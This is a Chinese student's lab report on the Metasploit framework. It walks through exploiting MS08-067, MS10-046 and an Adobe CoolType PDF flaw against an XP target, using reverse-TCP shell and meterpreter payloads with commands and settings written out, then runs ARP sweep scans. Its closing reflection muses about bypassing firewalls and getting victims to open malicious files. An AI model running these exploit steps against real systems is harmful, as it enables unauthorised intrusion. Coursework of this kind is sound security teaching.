20155208徐子涵 Exp5 MSF基础应用

基础问题回答

用自己的话解释什么是exploit,payload,encode.

  • Exploit:Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用)。有Exploit就肯定有漏洞,所以说exploit和漏洞就是紧密相关的。

  • Payload:payload属于名词意思有:有效载荷,而在网络攻防这一领域,他也可以说成是有效攻击载荷,相当于是将shellcode进行执行。

  • Encode:encode的意思就是编码,主要是将后门等程序进行处理从而实现免杀等效果。

实践开始

实践一

MS08-067远程溢出漏洞攻击

  • 首先打开msfconsole界面,指令就是简单的msfconsole

  • 然后进行检索,使用指令search ms08_067 来对漏洞可以运用的攻击模块进行查询:

  • 然后对所查询的攻击模块进行观察,看我们要使用哪一种攻击模块,这次我们选择使用exploit/windows/smb/ms08_067_netapi
    使用show payload可以查看我们使用的有效攻击载荷:

  • 然后我们对所选取的payload进行设置,指令为set payload generic/shell_reverse_tcp ,然后show options查看设置状态:

这里要注意,我们需要设置RHOST和LHOST,一个是靶机的IP地址,另一个是攻击机的IP地址,设置成功:

  • 然后就是最紧张刺激的时刻,开始攻击exploit,好的,一次性成功,获取主机的shell,这下我们可以为所欲为了,那就看一下靶机系统信息,使用指令systeminfo:

  • OK,成功完成。

实践二

对浏览器攻击:ms10_046漏洞攻击

  • 开始的步骤总是那么的相似,打开平台,对攻击模块进行检索:

  • 这次我们选择使用的是exploit/windows/browser/ms10_046_shortcut_icon_dllloader
    查看show payload:

  • 这里我们所选择的payload是windows/meterpreter/reverse_tcp
    并进行设置,先用show options查看所需要设置的参数:

  • 与上一个实践不同的是:SRVHOST填的是本地监听主机的IP地址,LHOST也是监听的IP地址,所以这里SRVHOST和LHOST都应该填攻击机的IP地址:

  • 设置成功后,我们打开xp系统的IE浏览器,打开链接:http://192.168.88.134:80/:

  • 此时kali显示接入一个会话:

  • 使用 sessions -i 2 选择会话2(因为第一次IP地址输错了,所以不是会话1,而是会话2),成功获取了靶机的shell,利用 systeminfo 指令查看靶机的系统信息:

  • OK,第二个实践大功告成。

实践三

对Adobe的漏洞攻击

  • 真的不想再重复上面那句话了,可是又有什么办法呢,还是要先打开平台检索和adobe漏洞有关的攻击模块啊:

  • 这次选择exploit/windows/fileformat/adobe_cooltype_sing,然后查看payload:

  • 选择windows/meterpreter/reverse_tcp 来攻击,并使用show options查看所需要设置的参数:

  • 这个好哎,只需要设置主机IP就可以,设置成功后直接开始输入exploit,发现产生了一个pdf文件:

  • 找到这一文件(刚开始还没找到,后来发现这个文件被隐藏了,设置显示隐藏文件就可以看到了):

  • 然后将文件拷到靶机中,设置主机IP及端口,输入exploit开始攻击,另一方面,在靶机中打开pdf文件,发现成功获取靶机shell:

实践四

ARP攻击

msf > use auxiliary/scanner/discovery/arp_sweep 
然后
set RHOSTS 192.168.108.0-192.168.108.255
然后 exploit进行攻击
  • 这个时候我们发现我们找到了192.168.88.130这一IP地址,这个就是我们想要找的靶机:

  • 可以发现NTP网络时间协议服务器,它是用来同步各个计算机的时间的协议用的

实践五

辅助模块的应用

  • 首先使用 show auxiliary 查看可以运用的辅助模块:

  • 这里我们选择ARP扫描,使用命令:use scanner/discovery/arp_sweep ,并使用show options查看参数:

  • 发现只需要设置主机的IP就可以

  • 使用exploit指令开始扫描,成功扫描到靶机的smb版本:

实验总结与体会

通过这次的实验,我们充分利用了msf这一平台,不过msf也仅仅只是一个品台,有很多攻击都不能通过其来实现,比如我们如果把靶机换成windows7或者以上版本的系统时,我们就很难攻击成功,所以如果我们还想在这一方面更进一步的话,我们就要多研究多琢磨,看看还有什么好的平台或者软件、漏洞才会更接近攻击的实现。

离实战还缺些什么技术或步骤?

我觉得距离实战还有不少的距离,我们要做到攻击就要绕过防火墙,而这次的实验整体都是关闭了防火墙来做的,还有就是怎么才能做到让靶机顺其自然的打开建立连接的文件,这都是值得思考的而问题。